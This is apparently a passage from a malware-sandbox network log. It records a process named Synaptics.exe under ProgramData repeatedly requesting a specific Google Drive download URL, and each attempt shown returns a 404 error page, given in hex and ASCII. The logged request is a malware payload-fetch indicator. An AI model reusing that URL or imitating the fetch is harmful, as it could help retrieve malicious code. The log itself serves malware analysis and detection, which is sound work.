                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:04 UTC798INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        263192.168.2.350048142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC795OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC798INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TmeQqhW4XW9GkQUMZxR6FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC799INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:04 UTC799INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6c 55 66 35 53 5a 58 38 48 48 42 71 75 59 6c 65 41 73 76 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AlUf5SZX8HHBquYleAsvKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:04 UTC801INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:04 UTC801INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        264192.168.2.350049142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC798OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC801INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WsFg1JMtD6Rfysx24vZEgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC802INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:04 UTC802INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 31 41 65 42 59 34 4e 35 64 65 77 35 4d 50 52 79 6a 62 72 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R1AeBY4N5dew5MPRyjbrJQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:04 UTC804INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:04 UTC804INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        265192.168.2.350050142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC801OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC804INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vbhEKudMOAS1RrrqdhiWsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC805INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 33 4d 61 54 7a 4f 42 32 6e 56 31 72 76 45 41 48 49 48 51 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J3MaTzOB2nV1rvEAHIHQhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:04 UTC807INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:04 UTC807INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        266192.168.2.350052142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC804OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC807INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dr2xnhQ1Mq5M8d3hW5EwWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC809INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 32 38 2f 49 2b 64 70 4c 6b 31 72 67 4e 6e 58 31 58 74 43 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e28/I+dpLk1rgNnX1XtCUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:04 UTC810INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:04 UTC810INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        267192.168.2.350053142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC807OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC810INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8FRwuho/AGlxiIMxuIuQuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC812INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 31 6b 70 69 4f 45 4e 72 70 79 34 70 62 33 63 38 4b 34 72 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L1kpiOENrpy4pb3c8K4rag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:04 UTC813INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:04 UTC813INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        268192.168.2.350054142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC810OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC814INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
